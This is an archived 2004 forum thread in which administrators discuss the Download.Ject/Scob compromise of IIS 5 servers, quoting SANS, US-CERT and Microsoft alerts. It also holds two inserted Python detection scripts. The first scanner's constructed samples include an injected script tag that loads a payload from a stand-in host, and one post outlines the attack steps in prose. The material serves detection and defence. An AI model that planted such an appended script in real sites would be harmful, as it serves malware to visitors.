New Threat


DjM
June 25th, 2004, 04:24 PM
My local media was reporting a "Big" threat hitting the internet which involved infected web sites. So I hustle my butt into work to check things out. I have no high level alerts from Symantec, only a note about a Category 1 virus which deals with infected web sites.

Symantec Link (http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html)

I head on over to the Internet Storm Center and they have more information:

A large number of web sites, some of them quite popular, were compromised earlier this week to distribute malicious code. The attacker uploaded a small file with javascript to infected web sites, and altered the web server configuration to append the script to all files served by the web server. The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.

Source (http://isc.sans.org/)

I check all my systems and I see nothing going on which could be related to any of this.

My question: are any of you seeing anything from this "Big Threat", or is this just another issue which is being overhyped by the media?

Cheers:

More information from SANS:

The visitor's browser is re-directed to the Russian URL listed below where a known Trojan program (msits.exe) is downloaded, along with some additional malware. Again, if the user's machine is updated with current AV software, this malware is detected and blocked.

The earliest reported infection was on June 20th.

An IIS server's configuration is somehow modified so that "enable document footer" is enabled for various (if not all) files and linked to the new .dll file(s) in \winnt\system32\inetsrv. This might be done with the help of a program called agent.exe installed via one of the multiple known IIS vulnerabilities.

What we DON'T know, and can use some help in figuring out, is how the malware is installed on the IIS server to begin with. Is there a zero-day floating around? Is it via a known vulnerability and the use of agent.exe as mentioned above? (Ed Skoudis, one of our handlers, suggested that perhaps the IIS system admin used a local copy of IE to browse a site and pulled down hostile JavaScript.)

vibronic
June 25th, 2004, 04:58 PM
Anyone have more information on the following article? Is this new?

http://www.cnn.com/2004/TECH/internet/06/24/internet.attack.ap/index.html

Snippet
------------
CHICAGO, Illinois (AP) -- Government and industry experts warned late Thursday of a mysterious, large-scale Internet attack against thousands of popular Web sites. The virus-like infection tries to implant hacker software onto the computers of all Web site visitors.

Industry experts and the Homeland Security Department were studying the infection to determine how it spreads across Web sites and find adequate defenses against it.

"Users should be aware that any Web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code," the government warned in one Internet alert.

The mysterious infection appeared to target at least one recent version of software by Microsoft Corp. to operate Web sites, called its Internet Information Server, popular among businesses and organizations.
------------

Just looking for more info, detection methods, or general information.

jeremy85
June 25th, 2004, 05:01 PM
I personally think it is a big deal, please keep us posted.
So far it looks like a bunch of big corporate web sites got hit, including one of Citibank's servers; right now no one knows how.
They were all "patched" but these servers are dumping trojans on visiting computers.
Right now info is NOT CERTAIN!!!!! I hate posting early but this is one to watch.
Keep us posted
jeremy

vibronic
June 25th, 2004, 05:06 PM
As far as detection, the virus apparently appends some Javascript to the bottom of pages delivered by IIS 5.0.

http://www.uscert.gov/current/current_activity.html#iis5

Snippet
--------------------
IIS 5 Web Server Compromises
added June 24
US-CERT is aware of new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites. Compromised sites are appending JavaScript to the bottom of web pages. When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end-user systems.

Web server administrators running IIS 5 should verify that there is no unusual JavaScript appended to the bottom of pages delivered by their web server.

This activity is another example of why end users must exercise caution when JavaScript is enabled in their web browser. Disabling JavaScript will prevent this activity from affecting an end-user's system, but may also degrade the appearance and functionality of some web sites that rely upon JavaScript. US-CERT recommends that end-users disable JavaScript unless it is absolutely necessary. Users should be aware that any web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code.

--------------------
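The check US-CERT asks for, as an added example that is not code from US-CERT, SANS or any poster in this thread: sweep the responses your own server delivers for a script appended past the end of the document. It also covers the earlier SANS note that the footer was appended to every file the server served, so it inspects non-HTML responses as well. The host names, the own_hosts allowlist and the sample responses are constructed for illustration.

```python
"""Sweep pages served by a web server for an injected footer script.

Added example for this thread; not code from US-CERT, SANS or any poster.
Host names and sample responses are constructed for illustration."""
import re
from typing import List, Set, Tuple
from urllib.parse import urlparse
from urllib.request import urlopen

HTML_END = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

Finding = Tuple[str, str]  # (reason, evidence)


def inspect_response(body: str, own_hosts: Set[str]) -> List[Finding]:
    """Return indicators that a served response carries an appended script.

    1. Any <script> element located after the last </html> tag: an IIS
       document footer is appended after the file, so that is where it lands.
    2. Any <script src=...> whose host is not one of own_hosts: the footer in
       this incident pulled its payload from another server. Relative src
       values have no host and are ignored.
    Check 2 runs over the whole body, so a footer appended to a non-HTML
    file (which has no </html> for check 1 to anchor on) is still caught."""
    own = {h.lower() for h in own_hosts}
    findings: List[Finding] = []
    ends = list(HTML_END.finditer(body))
    if ends:
        tail = body[ends[-1].end():]
        for m in SCRIPT_TAG.finditer(tail):
            findings.append(("script after </html>", m.group(0)[:120]))
    for m in SCRIPT_SRC.finditer(body):
        src = m.group(1)
        host = urlparse(src).hostname
        if host and host.lower() not in own:
            findings.append(("external script source", src))
    return findings


def scan_url(url: str, own_hosts: Set[str], timeout: float = 10.0) -> List[Finding]:
    """Fetch one URL from your own server and inspect the response body."""
    with urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return inspect_response(body, own_hosts)


# Constructed samples. bad-host.example stands in for the server the
# injected footer pointed at; www.example.com is the site being checked.
OWN_HOSTS = {"www.example.com"}
CLEAN_PAGE = (
    "<html><head><title>Home</title>"
    '<script src="/js/site.js"></script></head>'
    "<body><p>Hello</p></body></html>\r\n"
)
FOOTER = '<script src="http://bad-host.example/payload.js"></script>\r\n'
INFECTED_PAGE = CLEAN_PAGE + FOOTER
INFECTED_TEXT = "Plain text served by the same host.\r\n" + FOOTER

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_PAGE), ("infected page", INFECTED_PAGE),
                       ("infected text", INFECTED_TEXT)):
        print(name, inspect_response(body, OWN_HOSTS))
```

Run `scan_url("http://www.example.com/", OWN_HOSTS)` against each of your own sites once per crawl; a page that legitimately loads scripts from a CDN needs that CDN host added to own_hosts, otherwise check 2 reports it every time.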

Tiger Shark
June 25th, 2004, 05:16 PM
This seems to be on the front page in three or four threads.

I posted information in this thread (http://www.antionline.com/showthread.php?s=&threadid=259139). The Russian web site is now offline though that will change soon probably.

DjM
June 25th, 2004, 05:21 PM
Thanks Tiger, but for once, I am ahead of you on that. The address is blocked & my snort rules are updating as we speak. Are you seeing much activity?

I also sent a note to the Mod's to see if they wanted to merge these threads.

Cheers:

Tiger Shark
June 25th, 2004, 05:27 PM
DJM:

Yep, I'm blocked and snorting..... Not seen anything yet, (1.5 hours).

The problem with blocking it is that it's down anyway. How long do you think it will be before they re-enter the compromised web sites and change to a new address?

Snort is the protection. One guy on the snort-sigs list turned it off because of all the false positives but no-one else seems to be seeing them so the rule should be good.

I've checked my web sites too..... No .js except for those we put there.... :cool: but I'm keeping my eye on the sites. Hopefully the HIDS will alert me to any changes.

Negative
June 25th, 2004, 07:42 PM
Threats/threads merged. Thanks for reporting, DjM.

Ghost_25inf
June 25th, 2004, 08:18 PM
Looks to me like Geocities/Yahoo got hit.

Tiger Shark
June 25th, 2004, 08:30 PM
I don't know about Geocities but Yahoo doesn't seem to have it. Most of the home pages in my network are set for Yahoo and I haven't seen a single outbound request for the IP address of the Russian web site.

What do you ground your statement on?

jackell
June 25th, 2004, 10:11 PM
Additionally, Cluley says that there has been some evidence that Web sites have been able to avoid the threat because they downloaded a patch made available by Microsoft in April to thwart the Sasser worm.

Could that be why nobody is seeing much activity?

http://story.news.yahoo.com/news?tmpl=story&cid=1093&e=15&u=/pcworld/20040625/tc_pcworld/116690

Und3ertak3r
June 25th, 2004, 11:52 PM
Geez,

Lots of noise about this.. but very little tech info..

Can someone correct me please.. On the client side of things, would this make ANY Java-enabled browser on the Win32 platform vulnerable? Or is it just IE...

too bloody early on a (Working) Saturday Morning..

Cheers

ric-o
June 26th, 2004, 04:09 AM
I think the media is hyping this one a BIT. From all that I've read on NTBugTraq, Internet Storm Center, and others, the only servers vulnerable are the ones NOT patched with MS04-011 from April. If that's the case then I would hope we aren't hearing much because we have many smart administrators who have applied the April patch...at least I'm hoping that's the case. If not...shame shame shame.

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=259140#post762753) by Und3ertak3r
Can someone correct me please.. On the client side of things, would this make ANY Java-enabled browser on the Win32 platform vulnerable? Or is it just IE...

It looks like only Internet Explorer with JavaScript enabled is vulnerable...only a few of those huh? (snicker). I actually tested it out on our test hardware while the site was still up and found it calls a script which tried to pull up a .CHM file from the Windows directory with some parameter set - it wasn't successful. I then scanned the PC and found 2 HTM files detected with some sort of JavaScript code/trojan. Sorry I don't have the information handy here to give exact details.

The REAL bad thing I read is that it infects the client PC via some UNPATCHED IE holes! ...anyone betting on new MS IE patch soon?

This is a rather interesting _new_ (maybe not but recently new) way to infect PCs:
1) Infect a web server stealthily without alerting administrator
2) Change web server settings to have it attach malicious code on every page
3) Have the infected client pull up malicious code in the background, via a hidden IE frame or window so the user doesn't notice, and run it, getting infected with other bad stuff (backdoors, keyloggers, name that malware!)

And all my users and I want to do is surf the web safely....ha :mad:

allenb1963
June 26th, 2004, 09:30 AM
On its Web site, Microsoft said users could search for the files "Kk32.dll" or "Surf.dat" to see if their PCs were infected.

The Macintosh version of Internet Explorer is not affected, nor are non-Microsoft browsers such as Mozilla, Opera and Apple Computer Inc.'s Safari browser, security experts said.

Read it here. (http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5519888)

/me walks away muttering "IE bad...Mozilla good.....IE bad....Opera good....IE bad...."

spurious_inode
June 26th, 2004, 09:52 AM
People forget that IE is directly tied to the Windows shell (not that folks in Redmond have always admitted it....). I can see the appeal of IE, but am glad I don't have to sweat stuff like this out with those who actually use it.

-- bumblehead

jeremy85
June 26th, 2004, 05:20 PM
Sorry, looks to me like we were had.
I am not usually the boy who cries wolf and would like to offer my apology.
The threat of zero day is real and it looked to me from what I was reading yesterday that it had happened.
It now appears that either the "high profile sites" that were hit were bogus or it never happened.
Because
I can't confirm one site, and doesn't it have to run IIS?

Forgive my conspiracy theories but aren't they trying to pass an anti-adware law right now?
I hope I am wrong but I'm not holding my breath for that high profile list.
Please don't be too mad at me people, I didn't start it.
Didn't have to encourage it though until I was absolutely sure. Lesson learned.
jeremy

Tiger Shark
June 27th, 2004, 10:08 PM
Sorry, looks to me like we were had.
I am not usually the boy who cries wolf and would like to offer my apology.
The threat of zero day is real and it looked to me from what I was reading yesterday that it had happened.

Jeremy, no need to apologize. Computer security is all about knowing there is a threat out there no matter how it occurs and with the information available, (often limited), determining a technique to mitigate it in your own environment. You were far from alone in questioning the existence of another zero day. I, for one, (and I'm sure many here would concur), would rather have you "cry wolf" ten times than not to report a viable threat once. If nothing else you will make us look for evidence that corroborates your warning ourselves.

Und3ertak3r
June 28th, 2004, 11:39 AM
The media has done its job..

Had a pile of machines come in today complaining that they had been hit by this virus..

hmm
Comet Cursor
CoolWebSearch
Netsky
Nachi
PronDialers
Gaobot

Yep, they had a virus.. and I removed them.. but none were the one in question..

what happened to the bleeding edge of virii

off to ponder other problems..

cheers

DjM
June 28th, 2004, 05:17 PM
The Internet Storm Center (http://isc.sans.org/) has just posted this information:

We have received information about compromised systems with Internet Information Server. These systems had an administrator level account with the username 'IWAP_WWW' added.

Please check if your server has such an account and let us know what you find. Until we know more, we suggest that you consider a server compromised if you find an administrator account with this username.


Those of you running an IIS Web server may want to have a look. ;)

Cheers:
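The ISC check above, as an added example rather than anything ISC or DjM posted: parse the member list of the local Administrators group as `net localgroup Administrators` prints it, then flag the name ISC reported together with any member outside an operator-supplied baseline, since an attacker need not reuse the same username next time. SAMPLE_OUTPUT and the baseline names are constructed; `collect_members()` runs the real command on a Windows host. (The IUSR_ and IWAM_ accounts IIS 5 creates are ordinary user accounts, not administrators, so they do not belong in the baseline.)

```python
"""Flag unexpected members of the local Administrators group, including the
IWAP_WWW account ISC reported on compromised IIS servers.

Added example for this thread; not code from ISC or any poster. SAMPLE_OUTPUT
and the baseline names are constructed; on a real host use collect_members()."""
import subprocess
from typing import Iterable, List, Set

# Account names reported as indicators (from the ISC note quoted above).
# Windows account names are case-insensitive, so comparisons are lowered.
WATCHLIST: Set[str] = {"iwap_www"}


def parse_net_localgroup(output: str) -> List[str]:
    """Extract member names from the text `net localgroup <group>` prints.

    The output is a header, a line of dashes, one member per line (domain
    members appear as DOMAIN\\name), then the status line. Members run from
    the dashed line to the first blank or status line."""
    members: List[str] = []
    in_list = False
    for raw in output.splitlines():
        line = raw.strip()
        if not in_list:
            in_list = line.startswith("----")
            continue
        if not line or line.lower().startswith("the command completed"):
            break
        members.append(line)
    return members


def suspicious_admins(members: Iterable[str], baseline: Iterable[str]) -> List[str]:
    """Return members that are on the watchlist or missing from the baseline
    of accounts the operator expects to hold local administrator rights."""
    expected = {b.lower() for b in baseline}
    return [m for m in members
            if m.lower() in WATCHLIST or m.lower() not in expected]


def collect_members(group: str = "Administrators") -> List[str]:
    """Run `net localgroup` on the local Windows host and parse its output."""
    proc = subprocess.run(["net", "localgroup", group],
                          capture_output=True, text=True, check=True)
    return parse_net_localgroup(proc.stdout)


# Constructed sample in the format `net localgroup Administrators` uses.
SAMPLE_OUTPUT = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
IWAP_WWW
WEBSRV01\\webadmin
The command completed successfully.
"""
# Accounts this (constructed) server is expected to have in Administrators.
BASELINE = ["Administrator", "WEBSRV01\\webadmin"]

if __name__ == "__main__":
    found = parse_net_localgroup(SAMPLE_OUTPUT)
    print("members:", found)
    print("suspicious:", suspicious_admins(found, BASELINE))
```

Because the baseline diff reports any name it has not seen, keep the baseline per server (or per role) rather than one list for the whole farm; the watchlist stays short and only carries names that are indicators on their own.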

mohaughn
June 28th, 2004, 09:43 PM
I posted this in one of the other threads that were started on this "virus"... It would seem that it is not a self-propagating virus, and if you are patched with all of the current patches, you should not have a problem.


On June 24 2004 Microsoft began investigating a report that some
customers using IIS 5.0 (Internet Information Services), a component of
Windows 2000 Server, are being exploited by an issue known as
Download.Ject. More information is available at
http://www.microsoft.com/downloadject.

The Microsoft investigation is active with security response teams
dedicated to analyzing, resolving and communicating progress to
customers in a timely manner. It is important to note that thus far in
the investigation, through alerting customers and partners worldwide,
Microsoft has not been made aware of significant customer impact
based on Download.Ject.

Microsoft has confirmed that this attack is not self-propagating
malicious code. In other words, this is not a worm but a targeted
manual attack by individuals or entities towards a specific server.

To get the latest information please refer to
http://www.microsoft.com/downloadject

mohaughn
July 2nd, 2004, 04:41 PM
This just showed up in my email---

"Microsoft has released a configuration change that addresses the recent
malicious attack against Internet Explorer known as Download.Ject.

In addition, Microsoft has released a Knowledge Base article, 870669,
that provides information that administrators can use to implement this
change manually in their environment and to deploy the change across
their networks. This Knowledge Base article is available here:

http://support.microsoft.com/default.aspx?kbid=870669

Customers are advised to review the information in the Knowledge Base
article, test and deploy the change immediately in their environments,
if applicable.

If you have any questions regarding this alert please contact your
Technical Account Manager or Application Development Consultant."